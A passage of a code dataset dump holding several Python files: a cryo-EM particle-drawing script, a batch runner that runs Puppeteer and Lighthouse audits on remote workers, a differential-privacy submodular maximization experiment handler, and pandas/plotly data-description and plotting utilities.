l:\n s=r.split();\n if len(s)>1:\n c=s[0][1];\n if c.isdigit()==1:\n break;\n count=count+1;\n else:\n count=count+1;\n\n l=l[count:];\n\n return l;\n\n\n\ndef normImg(img,n):\n imax=np.max(img);\n imin=np.min(img);\n a=float(255)/(imax-imin);\n b=(-1)*a*imin;\n\n sizex=img.shape[0];\n sizey=img.shape[1];\n arr=np.zeros([sizex,sizey]);\n arr=np.round(a*img+b).astype(int);\n\n amax=np.max(arr);\n amin=np.min(arr);\n amean=np.mean(arr);\n astd=np.std(arr);\n\n bmin=amean-astd*n;\n bmax=amean+astd*n;\n c=float(255)/(bmax-bmin);\n d=(-1)*c*bmin;\n\n arr2=np.round(c*arr+d).astype(int);\n for x in range(0,sizex):\n for y in range(0,sizey):\n if arr2[x,y]<0:\n arr2[x,y]=0;\n elif arr2[x,y]>255:\n arr2[x,y]=255;\n\n arr3=np.zeros([sizex,sizey,3]);\n arr3[:,:,0]=arr2[:,:];\n arr3[:,:,1]=arr2[:,:];\n arr3[:,:,2]=arr2[:,:];\n\n return arr3;\n\ndef norm(fin,n):\n em=EMData(fin);\n img=EMNumPy.em2numpy(em);\n arr2=normImg(img,n);\n return arr2;\n\ndef drawOri(im,cx,cy, sx,sy,count):\n startx=cx-sx/2;\n starty=cy-sx/2;\n endx=cx+sx/2;\n endy=cy+sx/2;\n\n cv2.rectangle(im, (startx, starty), (endx, endy), (255,0,0), 2)\n\ndef draw(im,cx,cy, sx,sy,r,g,b,shape,r1,g1,b1):\n startx=cx-sx/2;\n starty=cy-sx/2;\n endx=cx+sx/2;\n endy=cy+sx/2;\n\n w=3;\n\n if shape==0:\n cv2.rectangle(im, (startx, starty), (endx, endy), (b,g,r), w)\n elif shape==1:\n cv2.circle(im,(cx,cy), sx/2, (b,g,r), w)\n elif shape==2:\n cv2.rectangle(im, (startx, starty), (endx, endy), (b,g,r), w)\n cv2.circle(im,(cx,cy), 10, (b1,g1,r1), w)\n\ndef getCors(fstar):\n f=open(fstar,'r');\n plist=f.readlines();\n plist=plist[6:]\n return plist;\n\n\ndef drawOne(fin,fstar,pSize,fout,start,stop, step,shape,arrColor,color):\n plist=readStar(fstar);\n\n if(fin[-3:]=='png'):\n im = cv2.imread(fin);\n elif (fin[-3:]=='mrc'):\n im=norm(fin,2);\n \n sx=pSize;\n sy=pSize;\n\n sizex,sizey,sizez=im.shape;\n\n count=0;\n cx=0;\n cy=0;\n \n index=0;\n p=cp=0;\n for line in plist:\n if count>=start and count1:\n x=float(s[0]);\n x=int(x);\n y=float(s[1]);\n y=int(y);\n\n if len(s)>=3:\n p=float(s[2])\n else:\n p=1;\n\n if len(s)==4:\n cp=float(s[3]);\n else:\n cp=0;\n\n if color==-1:\n index=int((count-20)/step);\n if index<0:\n index=0;\n elif index>9:\n index=9;\n else:\n index=int(color);\n\n r,g,b=arrColor[index]\n\n if color==-1:\n cdex=int((cp-0.5)*10);\n if cdex<0:\n cdex=0;\n else:\n cdex=int(color);\n r1,g1,b1=arrColor[cdex];\n\n draw(im,x,y,sx,sy,r,g,b,shape,r1,g1,b1);\n count=count+1;\n \n cv2.imwrite(fout,im);\n\n\ndef usage():\n print(\"mpiexec -n 6 -i /home/ict/dataset/objEmDb/experiment/empiar10005/data2 \\\n -o /home/ict/dataset/objEmDb/experiment/empiar10005/rec \\\n -s /home/ict/dataset/objEmDb/experiment/empiar10005/autopick-results-by-demo-type3-iter1-2 \\\n -p 200 -d\");\n\nif __name__==\"__main__\":\n opts, args = getopt.getopt(sys.argv[1:], \"i:o:s:p:z:q:c:n:f:e:dmh\") \n din=\"\" \n dout=\"\"\n dstar=\"\"\n pSize=0;\n isDir=0;\n shape=0;\n isMrc=-1;\n start=30;\n step=10;\n color=-1;\n stop=200000;\n\n for op, value in opts: \n if op == \"-i\": \n din = value \n elif op == \"-o\": \n dout = value\n elif op ==\"-s\":\n dstar= value;\n elif op ==\"-p\":\n pSize=int(value)\n elif op ==\"-z\":\n start=float(value)\n elif op ==\"-e\":\n stop=float(value)\n elif op ==\"-c\":\n step=int(value)\n elif op ==\"-q\":\n color=int(value)\n elif op ==\"-f\":\n shape=int(value)\n elif op==\"-d\":\n isDir=1\n elif op==\"-m\":\n isMrc=1\n elif op==\"-n\":\n dnum=int(value);\n elif op == \"-h\": \n usage() \n din='/home/ict/pickyEye/empiar10075/relion/pickyEye/empiar10075/data/FoilHole_19046908_Data_19046157_19046158_20140520_0021_frames_SumCorr.png'\n dstar='/home/ict/pickyEye/empiar10075/relion/pickyEye/empiar10075/star/FoilHole_19046908_Data_19046157_19046158_20140520_0021_frames_SumCorr.star';\n dout='./test.png'\n start=50;\n step=10;\n shape=1;\n pSize=300;\n\n a=np.zeros([27,3]);\n index =0;\n \n a[0]=255,0,0;\n a[1]=0,0,255;\n a[2]=0,255,0;\n a[3]=255,0,255;\n a[4]=0,255,255;\n a[5]=255,255,0;\n a[6]=75,0,130;\n a[7]=0,100,0;\n a[8]=128,0,0;\n a[9]=128,128,0;\n a[10]=0,0,0;\n print(din,dout,dstar,pSize);\n if isDir ==1:\n comm=MPI.COMM_WORLD\n crank=comm.Get_rank();\n csize=comm.Get_size();\n\n if crank==0:\n if os.path.isdir(dout)==0:\n os.mkdir(dout);\n comm.barrier();\n\n\n fins=os.listdir(dstar);\n for i in range(crank,len(fins),csize):\n f=fins[i];\n if f[-4:]=='star' :\n fin=f[:-5]+'.png';\n fin=os.path.join(din,fin);\n\n if os.path.exists(fin)==0:\n fin=f[:-5]+'.mrc';\n fin=os.path.join(din,fin);\n if os.path.exists(fin)==1:\n fstar=os.path.join(dstar,f);\n fout=f[:-5]+'.png';\n fout=os.path.join(dout,fout);\n if os.path.exists(fstar)==1:\n print(fstar, fin);\n drawOne(fin,fstar,pSize,fout,start,stop, step, shape,a,color);\n else:\n print('no file:', fin);\n\n comm.barrier();\n else:\n drawOne(din,dstar,pSize,dout,start, step, shape,a,color);\n","repo_name":"smart111/PIXER","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19995945799","text":"#!/usr/bin/env python3\nimport datetime\nimport glob\nimport logging\nimport os\nimport subprocess\nimport sys\nimport tarfile\n\nimport ncscli.batchRunner as batchRunner\n\n\nclass PuppeteerLighthouseFrameProcessor(batchRunner.frameProcessor):\n '''defines details for using Puppeteer and Lighthouse to analyze a web page from multiple devices'''\n\n def installerCmd( self ):\n return 'apt-get -qq update > /dev/null && apt-get -qq install -y chromium nodejs npm > /dev/null && ln -s chromium /usr/bin/chromium-browser && PUPPETEER_SKIP_DOWNLOAD=yes npm install --quiet -g puppeteer && npm install --quiet -g lighthouse@6.5.0'\n\n PuppeteerFilePath = 'Puppeteer.js'\n\n def frameOutFileName( self, frameNum ):\n return 'Puppeteer_results_%03d.tar.gz' % frameNum\n\n def frameCmd( self, frameNum ):\n cmd = 'date && export NODE_PATH=/usr/local/lib/node_modules && export PATH=$PATH:/usr/local/bin && node %s && lighthouse https://www.google.com --no-enable-error-reporting --chrome-flags=\"--headless --no-sandbox\" --emulated-form-factor=none --throttling-method=provided && mv google.png google_%03d.png && mv *google*.html google_%03d.html && tar -zcvf Puppeteer_results_%03d.tar.gz google*' % (\n self.PuppeteerFilePath, frameNum, frameNum, frameNum\n )\n return cmd\n\ndef untarResults( outDataDir ):\n tarFilePaths = glob.glob( outDataDir+'/Puppeteer_results_*.tar.gz' )\n for tarFilePath in tarFilePaths:\n with tarfile.open( tarFilePath, 'r' ) as tarFile:\n try:\n tarFile.extractall( path=outDataDir )\n except Exception as exc:\n logger.warning( 'could not untar %s; %s', tarFilePath, exc )\n\n\n# configure logger formatting\n#logging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogFmt = '%(asctime)s %(levelname)s %(module)s %(funcName)s %(message)s'\nlogDateFmt = '%Y/%m/%d %H:%M:%S'\nformatter = logging.Formatter(fmt=logFmt, datefmt=logDateFmt )\nlogging.basicConfig(format=logFmt, datefmt=logDateFmt)\n#batchRunner.logger.setLevel(logging.DEBUG) # for more verbosity\n\ndateTimeTag = datetime.datetime.now().strftime( '%Y-%m-%d_%H%M%S' )\noutDataDir = 'data/puppeteer_' + dateTimeTag\n\ntry:\n rc = batchRunner.runBatch(\n frameProcessor = PuppeteerLighthouseFrameProcessor(),\n commonInFilePath = PuppeteerLighthouseFrameProcessor.PuppeteerFilePath,\n authToken = os.getenv( 'NCS_AUTH_TOKEN' ) or 'YourAuthTokenHere',\n encryptFiles=False,\n timeLimit = 80*60,\n instTimeLimit = 24*60,\n frameTimeLimit = 600,\n filter = '{ \"regions\": [\"usa\", \"india\"], \"dar\": \">= 99\", \"dpr\": \">=48\", \"ram\": \">=3800000000\", \"storage\": \">=2000000000\" }',\n outDataDir = outDataDir,\n startFrame = 1,\n endFrame = 5,\n nWorkers = 10,\n limitOneFramePerWorker = True,\n autoscaleMax = 2\n )\n if rc==0 and os.path.isfile( outDataDir +'/recruitLaunched.json' ):\n untarResults( outDataDir )\n rc2 = subprocess.call( [sys.executable, 'processPuppeteerOutput.py', '--dataDirPath', outDataDir],\n stdout=subprocess.DEVNULL )\n if rc2:\n logger.warning( 'processPuppeteerOutput exited with returnCode %d', rc2 )\n sys.exit( rc )\nexcept KeyboardInterrupt:\n logger.warning( 'an interuption occurred')\n","repo_name":"neocortix/ncscli","sub_path":"examples/batchMode/runBatchPuppeteerLighthouse.py","file_name":"runBatchPuppeteerLighthouse.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"33973922937","text":"import os\nfrom pydoc import cli\nimport random\nimport math\nimport numpy as np\nimport csv\nimport pickle\nimport time as tm\nimport multiprocessing as mp\nimport datetime\nfrom dpsm.Client import Client, dotProduct, Fast_Client\nfrom dpsm.FDP_Server import FDP, calc_kernel_radius, FDP_Lazy,FDP_PF\nfrom dpsm.CDP_Server import CDP\n\n\n\ndef read_dict(input_path: str):\n with open(input_path, \"rb\") as f:\n dic = pickle.load(f)\n return dic\n\n\ndef get_args_dict(dataset, algorithm, k, l, gamma, seed=0, epsilon=1, n=None, m=None, select_method=None, noise=None, cutoff=None, s=None, beta=None, save=True, fast=False,e0_ratio=None):\n dic = dict()\n dic[\"dataset\"] = dataset\n dic[\"algorithm\"] = algorithm\n dic[\"k\"] = k\n dic[\"epsilon\"] = epsilon\n dic[\"gamma\"] = gamma\n dic[\"save\"] = save\n dic[\"seed\"] = seed\n dic[\"l\"] = l\n dic[\"fast\"] = fast\n dic[\"save\"] = save\n if m is not None:\n dic[\"m\"] = m\n if n is not None:\n dic[\"n\"] = n\n\n if algorithm == \"Greedy\":\n dic[\"select_method\"] = \"greedy\"\n if algorithm == \"CDP\":\n if select_method is None:\n raise ValueError(\"Error: Missing parameter: select_method.\")\n dic[\"select_method\"] = select_method\n if algorithm == \"FDP\":\n if noise is None:\n raise ValueError(\"Error: Missing parameter: noise.\")\n dic[\"noise\"] = noise\n if algorithm == \"FDP_Lazy\":\n if noise is None:\n raise ValueError(\"Error: Missing parameter: noise.\")\n if cutoff is None:\n raise ValueError(\"Error: Missing parameter: cutoff.\")\n dic[\"noise\"] = noise\n dic[\"cutoff\"] = cutoff\n if algorithm == \"FDP_PF\":\n if cutoff is None:\n raise ValueError(\"Error: Missing parameter: cutoff.\")\n if e0_ratio is None:\n raise ValueError(\"Error: Missing parameter: e0_ratio.\")\n dic[\"cutoff\"] = cutoff\n dic[\"e0_ratio\"]=e0_ratio\n return dic\n\n\nclass Handler:\n def __init__(self, MaxP=10, save_path=\"res.csv\", res_fields=None, check_fields=None) -> None:\n self.MaxP = MaxP\n self.Pcnt = 0\n self.q = mp.Queue()\n self.save_path = save_path\n self.res_fields = res_fields\n if res_fields is None:\n self.res_fields = [\"dataset\", \"algorithm\", \"utility_func\", \"l\", \"seed\", \"n\", \"m\", \"k\", \"gamma\", \"epsilon\",\n \"delta\",\"epsilon_0\", \"delta_0\", \"sigma\",\"epsilon_1\",\"epsilon_2\", \"radius\", \"select_method\", \"noise\",\"e0_ratio\",\n \"cutoff\", \"sol\", \"result\", \"time\",\"communication_cost\"]\n self.args = dict()\n self.check_fileds = check_fields\n if check_fields is None:\n self.check_fileds = [\"dataset\", \"algorithm\", \"l\", \"seed\", \"n\", \"m\", \"k\", \"gamma\", \"epsilon\",\"e0_ratio\",\n \"select_method\", \"noise\", \"cutoff\"]\n self.exist_args = set()\n\n try:\n with open(self.save_path, 'r', newline='') as csvfile:\n print('file exists')\n except:\n with open(self.save_path, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=self.res_fields)\n writer.writeheader()\n\n with open(self.save_path) as f:\n d = csv.DictReader(f)\n cnt = 0\n for row in d:\n dd = dict()\n for key in self.check_fileds:\n if key == \"epsilon\" or key == \"gamma\":\n dd[key] = str(float(row[key]))\n else:\n dd[key] = row[key]\n self.exist_args.add(str(dd))\n\n def start(self, args):\n self.args = args.copy()\n self.start_work()\n\n def start_work(self):\n if \"epsilon\" not in self.args:\n self.args[\"epsilon\"] = 1\n if self.existed(self.args):\n print(\"ARGS EXISTED. STOP RUNNING.\")\n return\n\n self.exist_args.add(str(self.args))\n mp.Process(target=self.work, args=(self.args, self.q)).start()\n self.Pcnt += 1\n self.wait(self.MaxP)\n\n def existed(self, args):\n nargs = dict()\n # print(\"nb\")\n for key in self.check_fileds:\n nargs[key] = '' if key not in args else str(args[key])\n if key == \"epsilon\" or key == \"gamma\":\n nargs[key] = str(float(nargs[key]))\n print(str(nargs))\n return str(nargs) in self.exist_args\n\n def wait(self, minp=1):\n\n while self.Pcnt >= minp:\n a = self.q.get()\n if \"Exist\" in a:\n self.Pcnt -= 1\n continue\n if a[\"save\"]:\n with open(self.save_path, \"a\", newline='') as f:\n fileds = self.res_fields\n w = csv.DictWriter(\n f, extrasaction=\"ignore\", fieldnames=fileds)\n w.writerow(a)\n self.Pcnt -= 1\n print(self.Pcnt,\" process(es) left.\")\n\n def work(self, args, q):\n random.seed(1)\n np.random.seed(1)\n\n random.seed(args[\"seed\"])\n np.random.seed(args[\"seed\"])\n\n items = read_dict(args[\"items_path\"])\n users = read_dict(args[\"users_path\"])\n\n if \"n\" not in args:\n args[\"n\"] = len(users)\n args[\"m\"] = len(items)\n\n args[\"delta\"] = 1/(args[\"n\"]**1.5)\n\n partition = [i % args[\"l\"] for i in range(args[\"n\"])]\n selected_user = [(1 if i < args[\"n\"] else 0)\n for i in range(len(users))]\n\n # shuffle and partition data\n random.shuffle(partition)\n #\n random.shuffle(selected_user)\n cnt = 0\n num = -1\n users_data = [dict() for i in range(args[\"l\"])]\n for key in users.keys():\n num += 1\n if selected_user[num] == 0:\n continue\n users_data[partition[cnt]][key] = users[key]\n cnt += 1\n\n # create client\n clients = []\n for i in range(args[\"l\"]):\n if args[\"fast\"] is True:\n clients.append(Fast_Client(users_data[i], items, args))\n else:\n clients.append(Client(users_data[i], items, args))\n if self.args[\"algorithm\"] != \"Greedy\":\n self.calc_parameters(args)\n\n func = None\n if args[\"algorithm\"] == \"Greedy\":\n func = CDP\n elif args[\"algorithm\"] == \"FDP\":\n func = FDP\n elif args[\"algorithm\"] == \"CDP\":\n func = CDP\n elif args[\"algorithm\"] == \"FDP_Lazy\":\n func = FDP_Lazy\n elif args[\"algorithm\"] == \"FDP_PF\":\n func=FDP_PF\n print(args)\n if self.existed(args):\n args[\"Exist\"] = True\n print(\"ARGS ALREADY EXIST. STOP RUNNING.\")\n q.put(args)\n return\n sol, time,comm_cost = func(items, args, clients)\n benefits = 0\n if args[\"fast\"] is False:\n for client in clients:\n benefits += sum(client.user_benefits.values())\n else:\n for client in clients:\n benefits += client.user_benefits\n args[\"sol\"] = sol\n args[\"result\"] = benefits\n args[\"time\"] = time\n args[\"communication_cost\"]=comm_cost\n print(str(datetime.datetime.now()),\" done:\", args)\n q.put(args)\n\n def F(self, t, a, b, c):\n return (t*a)/(b-(c/(t-1)))\n\n def logjc(self, n):\n s = 0\n for i in range(n):\n s += math.log(i+1)\n return s\n\n def calc_parameters(self, args):\n\n e = args[\"epsilon\"]\n if args[\"algorithm\"] == \"CDP\":\n k = args[\"k\"]\n elif args[\"algorithm\"] == \"FDP\":\n k = args[\"k\"]*args[\"m\"]\n elif args[\"algorithm\"] == \"FDP_Lazy\":\n k = args[\"m\"]+(args[\"k\"]-1)*args[\"cutoff\"]\n elif args[\"algorithm\"] == \"FDP_PF\":\n k= args[\"k\"]*args[\"cutoff\"]\n\n d = args[\"delta\"]\n gamma = args[\"gamma\"]\n\n basic_e = e/k\n basic_d = d/k\n\n adv_d = d/2\n a = k/2\n b = math.sqrt(2*k*math.log(1/adv_d))\n c = -e\n delta = b*b-4*a*c\n\n adv_e = (-b+math.sqrt(delta))/(a+a)\n print(\"basic_e:\", basic_e, \"basic_d:\", basic_d)\n print(\"adv_e:\", adv_e, \"adv_d:\", adv_d)\n\n if basic_e > adv_e:\n args[\"epsilon_0\"] = basic_e\n args[\"delta_0\"] = basic_d\n else:\n args[\"epsilon_0\"] = adv_e\n args[\"delta_0\"] = adv_d/k\n\n args[\"delta_0\"] /= gamma\n if args[\"algorithm\"]== \"FDP_PF\":\n args[\"epsilon_1\"] = math.log(1 + (math.exp(args[\"epsilon_0\"]*args[\"e0_ratio\"]) - 1) / gamma)\n args[\"epsilon_2\"] =math.log(1 + (math.exp(args[\"epsilon_0\"]*(1-args[\"e0_ratio\"])) - 1) / gamma) \n \n args[\"epsilon_0\"] = math.log(\n 1 + (math.exp(args[\"epsilon_0\"]) - 1) / gamma)\n if args[\"algorithm\"] == \"FDP\" or args[\"algorithm\"] == \"FDP_Lazy\":\n a = k*args[\"gamma\"]*args[\"gamma\"]\n b = args[\"epsilon\"]\n c = math.log(1/args[\"delta\"])\n # print(a,b,c)\n d = 1+c/b\n sigma = math.sqrt(a/b*(2*math.sqrt(d*d-d)+2*d-1)/2)\n args[\"sigma\"] = sigma\n print(\"sigma:\", sigma)\n","repo_name":"tc2000731/code-dpsm","sub_path":"dpsm/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":9292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42609092034","text":"import os\nimport shutil\nimport math\nimport numpy as np\nimport pandas as pd\nimport polars as pl\nfrom typing import List\nimport warnings\n\nfrom IPython.display import display, HTML\nimport plotly.graph_objects as go\nimport plotly.offline as py\nfrom plotly.subplots import make_subplots\n\nimport config\n\nHEIGHT_PLOT = 650\n\n\ndef describe_numeric(df, cols_num=None, percentiles=None, stats_nans=True):\n \"\"\"\n Describe numeric columns\n :param df: pandas data frame\n :param cols_num: numeric columns to describe, by default: identified automatically\n :param percentiles: percentiles to compute, default: [0.05, 0.25, 0.50, 0.75, 0.95]\n :return: pandas df with stats\n \"\"\"\n\n if isinstance(df, pd.Series) or isinstance(df, np.ndarray) or isinstance(df, list):\n df = pd.DataFrame({'value': df})\n\n if cols_num is None:\n cols_num = list(df.head(1).select_dtypes(include=['number']).columns)\n if percentiles is None:\n percentiles = [0.05, 0.25, 0.50, 0.75, 0.95, 0.98, 0.99]\n if len(cols_num) == 0:\n return None\n d_describe = df[cols_num].describe(percentiles=percentiles).T\n if stats_nans:\n d_describe['count_nan'] = df.isnull().sum()\n d_describe['prc_nan'] = 1 - d_describe['count'] / float(df.shape[0])\n return d_describe\n\n\ndef describe_categorical(df, cols=None):\n \"\"\"\n Describe categorical columns\n :param df: pandas data frame\n :param cols: categorical columns to describe, by default: identified automatically\n :return: pandas df with stats\n \"\"\"\n if cols is None:\n cols = list(df.head(1).select_dtypes(include=['object']).columns)\n if len(cols) == 0:\n return None\n d_describe = df[cols].astype('category').describe().T\n return d_describe\n\n\ndef describe_categorical_freq(x: pd.Series, name: str = None, max_show: int = 10, min_prc: float = 0.001):\n \"\"\"\n Describe series with categorical values (counts, frequency)\n :param x: series to describe\n :param name: name\n :param max_show: max values to show\n :param min_prc: minimum size (in %) for the category to show in stats\n :return: pandas df with stats\n \"\"\"\n if name is None:\n try:\n name = x.name\n except:\n name = 'value'\n tmp = pd.DataFrame({name: x})\n\n agg = tmp.groupby([name], dropna=False, as_index=True).agg({name: len}).rename(columns={name: 'count'})\n agg['percentage'] = agg['count'] / sum(agg['count'])\n agg.sort_values(['count'], ascending=False, inplace=True)\n agg.reset_index(drop=False, inplace=True)\n filter_out = (((agg['percentage'] < min_prc)\n & (pd.Series(range(len(agg))) > max_show))\n | (pd.Series(range(len(agg))) > max_show))\n agg = agg.loc[~filter_out, ]\n return agg\n\n\ndef display_descr_cat_freq(df, cols=None, skip_freq_cols=None, show_title=False):\n \"\"\"\n Describe categorical columns in dataframe (counts, frequency)\n :param df: data frame\n :param cols: for which columns to compute statistics, by default: identifed automatically\n :param skip_freq_cols: which columns to skip\n :return: pandas df with stats\n \"\"\"\n if cols is None:\n cols = list(df.head(1).select_dtypes(include=['object']).columns)\n if skip_freq_cols is None:\n skip_freq_cols = []\n if len(cols) == 0:\n return None\n display(describe_categorical(df, cols))\n for col in cols:\n if col not in skip_freq_cols:\n if show_title:\n display(HTML(f'
    {col}'))\n # else:\n # display(HTML('
    '))\n display(describe_categorical_freq(df[col]))\n\n\ndef set_display_options():\n \"\"\"\n Set display options for numbers, table width, etc.\n :return: None\n \"\"\"\n pd.set_option('plotting.backend', 'plotly')\n pd.set_option('display.max_rows', 100)\n pd.set_option('display.max_columns', 50)\n pd.set_option('display.width', 2000)\n pd.set_option('display.max_colwidth', 150)\n pd.set_option('max_colwidth', 150)\n pd.set_option('display.precision', 2)\n pd.set_option('display.chop_threshold', 1e-6)\n # pd.set_option('expand_frame_repr', True)\n pd.set_option('display.float_format', lambda x: '%.3f' % x)\n warnings.simplefilter('ignore')\n pl.Config.set_tbl_rows(10)\n display(HTML(\"\"))\n\n\ndef get_last_commit_hash():\n try:\n import subprocess\n result = subprocess.check_output(['git', 'log', '-1', '--pretty=format:\"%H\"'])\n return result.decode('utf-8').replace('\"', '')[:8]\n except Exception as e:\n return None\n\n\ndef get_timestamp():\n from datetime import datetime\n return datetime.now().strftime(\"%Y%m%d%H%M%S\")\n\n\ndef get_submit_file_name(prefix='submission', tag=None):\n tag = '' if tag is None else f'-{tag}'\n commit_hash = '' if get_last_commit_hash() is None else f'-{get_last_commit_hash()}'\n timestamp = f'-{get_timestamp()}'\n return f'{prefix}{timestamp}{tag}{commit_hash}'\n\n\ndef get_best_metric(lgbm_ranker):\n try:\n metric_, best_score = list(lgbm_ranker.best_score_['valid'].items())[0]\n except (AttributeError, IndexError):\n try:\n metric_, best_score = list(lgbm_ranker.best_score_['train'].items())[0]\n except:\n metric_, best_score = 'NA', 'NA'\n\n return metric_, best_score\n\n\ndef get_best_iter(lgbm_ranker):\n best_iter = lgbm_ranker.best_iteration_ \\\n if lgbm_ranker.best_iteration_ is not None \\\n else lgbm_ranker.get_params().get('n_estimators')\n return best_iter\n\n\ndef plot_forecast_in_out(self):\n fig = go.Figure()\n t = self.forecaster.target_name\n fig.add_trace(\n go.Scatter(\n x=pd.to_datetime(np.concatenate([self.forecast_in['upgrade'], self.forecast_out['upgrade']])),\n y=np.concatenate([self.forecast_in[t], self.forecast_out[t]]),\n name=f\"actual {t}\", mode='lines', opacity=0.7,\n line=dict(color='black', width=2))\n )\n fig.add_trace(\n go.Scatter(\n x=self.forecast_in['upgrade'], y=self.forecast_in[f'pred_{t}'],\n name=f\"forecast in\", mode='lines', opacity=0.7, line=dict(color='green', width=2))\n )\n fig.add_trace(\n go.Scatter(\n x=self.forecast_out['upgrade'], y=self.forecast_out[f'pred_{t}'],\n name=f\"forecast out\", mode='lines', opacity=0.7, line=dict(color='red', width=2))\n )\n fig.update_layout(title=self.forecaster_class.__name__, autosize=True, height=750,\n legend=dict(x=0, y=1, bgcolor='rgba(0,0,0,0)'))\n py.iplot(fig)\n # py.plot(fig)\n\n\ndef plot_multiple_cfips(df, measure='microbusiness_density', title=None, max_n=30, height=config.HEIGHT_PLOT_MEDIUM):\n fig = go.Figure()\n\n if title is None:\n title = ', '.join(sorted(list(df['state'].unique())))\n\n for cfips in sorted(list(df['cfips'].unique()))[:max_n]:\n df_cfips = df.filter(pl.col('cfips') == cfips)\n fig.add_trace(\n go.Scatter(\n x=df_cfips['first_day_of_month'],\n y=df_cfips[measure],\n name=cfips,\n mode='lines',\n opacity=0.7\n )\n )\n fig.update_layout(\n title=f'{title} - {measure}',\n autosize=True,\n height=height,\n legend=dict(x=1, y=0, bgcolor='rgba(0,0,0,0)'),\n yaxis={'title': measure},\n margin=config.PLOT_MARGINS_MEDIUM,\n )\n py.iplot(fig)\n\n\ndef plot_multiple_cfips_microbiz_dens(df):\n return plot_multiple_cfips(df, measure='microbusiness_density')\n\n\ndef plot_multiple_cfips_active(df):\n return plot_multiple_cfips(df, measure='active')\n\n\ndef plot_multiple_cfips_population(df):\n return plot_multiple_cfips(df, measure='population')\n\n\ndef plot_aggregated_cfips(df, title=None, measure='microbusiness_density', by='first_day_of_month',\n lo_q=0.25, mid='mean', hi_q=0.75, include_hi_lo=True, height=config.HEIGHT_PLOT_LOW):\n\n if title is None:\n title = ', '.join(sorted(list(df['state'].unique())))\n\n df_agg = df \\\n .groupby(by) \\\n .agg([pl.quantile(measure, hi_q).alias(f'q{hi_q * 100}'),\n pl.median(measure).alias('median'),\n pl.mean(measure).alias('mean'),\n pl.sum(measure).alias('sum'),\n pl.quantile(measure, lo_q).alias(f'q{lo_q * 100}'),\n ]) \\\n .sort(by)\n\n fig = go.Figure()\n fig.add_trace(\n go.Scatter(\n name=mid,\n x=df_agg['first_day_of_month'],\n y=df_agg[mid],\n mode='lines',\n line=dict(color='rgb(31, 119, 180)', width=3),\n showlegend=False\n )\n )\n\n if include_hi_lo:\n fig.add_trace(\n go.Scatter(\n name=f'q{hi_q * 100}',\n x=df_agg['first_day_of_month'],\n y=df_agg[f'q{hi_q * 100}'],\n mode='lines',\n marker=dict(color=\"#444\"),\n line=dict(width=0),\n showlegend=False\n )\n )\n\n fig.add_trace(\n go.Scatter(\n name=f'q{lo_q * 100}',\n x=df_agg['first_day_of_month'],\n y=df_agg[f'q{lo_q * 100}'],\n marker=dict(color=\"#444\"),\n line=dict(width=0),\n mode='lines',\n fillcolor='rgba(68, 68, 68, 0.3)',\n fill='tonexty',\n showlegend=False\n )\n )\n\n fig.update_layout(\n title=f'{title} - {measure}',\n autosize=True,\n height=height,\n yaxis_title=measure,\n hovermode=\"x\",\n margin=config.PLOT_MARGINS_SMALL,\n )\n py.iplot(fig)\n\n\ndef plot_aggregated_cfips_microbiz_dens(df):\n return plot_aggregated_cfips(df, measure='microbusiness_density')\n\n\ndef plot_aggregated_cfips_active(df):\n return plot_aggregated_cfips(df, measure='active', mid='sum', include_hi_lo=False, height=config.HEIGHT_PLOT_MEDIUM)\n\n\ndef plot_aggregated_cfips_population(df):\n return plot_aggregated_cfips(df, measure='population', mid='sum', include_hi_lo=False)\n\n\ndef make_plots_cfips(df_train, state):\n if config.MAKE_PLOTS:\n return\n\n # plot_multiple_cfips_microbiz_dens(df_train.filter(pl.col('state') == state))\n plot_multiple_cfips_active(df_train.filter(pl.col('state') == state))\n # plot_multiple_cfips_population(df_train.filter(pl.col('state') == state))\n\n # plot_aggregated_cfips_microbiz_dens(df_train.filter(pl.col('state') == state))\n plot_aggregated_cfips_active(df_train.filter(pl.col('state') == state))\n # plot_aggregated_cfips_population(df_train.filter(pl.col('state') == state))\n\n\ndef get_stats(values, by, sub_na_with=None):\n if sub_na_with is not None:\n by = np.array(by)\n by[~(by == by)] = sub_na_with\n d = pd.DataFrame({'values': np.array(values).astype('float'), 'by': np.array(by)})\n d_agg = d.groupby('by', as_index=False).agg(\n count=('values', len),\n min=('values', np.nanmin),\n p10=('values', lambda x: np.nanpercentile(x, 10)),\n p25=('values', lambda x: np.nanpercentile(x, 25)),\n p50=('values', lambda x: np.nanpercentile(x, 50)),\n mean=('values', np.nanmean),\n sd=('values', np.nanstd),\n p75=('values', lambda x: np.nanpercentile(x, 75)),\n p90=('values', lambda x: np.nanpercentile(x, 90)),\n max=('values', np.nanmax)\n )\n return d_agg\n\n\ndef get_box_chart(x, y, name=None, return_stats=False, order_by_count=False, min_prc_count=None, sub_na_with=None, **kwargs):\n d_agg = get_stats(y, x, sub_na_with)\n\n if order_by_count:\n d_agg = d_agg.sort_values(['count'], ascending=False)\n\n if min_prc_count is not None:\n d_agg = d_agg.loc[d_agg['count'] > (min_prc_count*sum(d_agg['count']))]\n\n box = go.Box(\n name=name,\n x=d_agg['by'],\n lowerfence=d_agg['p10'],\n q1=d_agg['p25'],\n median=d_agg['p50'],\n mean=d_agg['mean'],\n q3=d_agg['p75'],\n upperfence=d_agg['p90'],\n # boxpoints=False,\n # boxmean=True,\n **kwargs\n )\n if return_stats:\n return box, d_agg\n else:\n return box\n\n\ndef plot_box_plot(target_values, by_values, yaxis_title='value', xaxis_title='by', x_as_category=True,\n order_by_count=False, min_prc_count=None, sub_na_with=None):\n fig = go.Figure()\n trace_ = get_box_chart(x=by_values, y=target_values, name=xaxis_title,\n order_by_count=order_by_count, min_prc_count=min_prc_count, sub_na_with=sub_na_with)\n fig.add_trace(trace_)\n fig.update_layout(\n title='',\n autosize=True, legend=dict(x=0, y=1, bgcolor='rgba(0,0,0,0)'), height=config.HEIGHT_PLOT_MEDIUM, # width=1200,\n margin=dict(l=25, r=25, t=25, b=25), # yaxis_range=rng_y_boxplot, # boxmode='group',\n xaxis_title=xaxis_title,\n yaxis_title=yaxis_title,\n )\n if x_as_category:\n 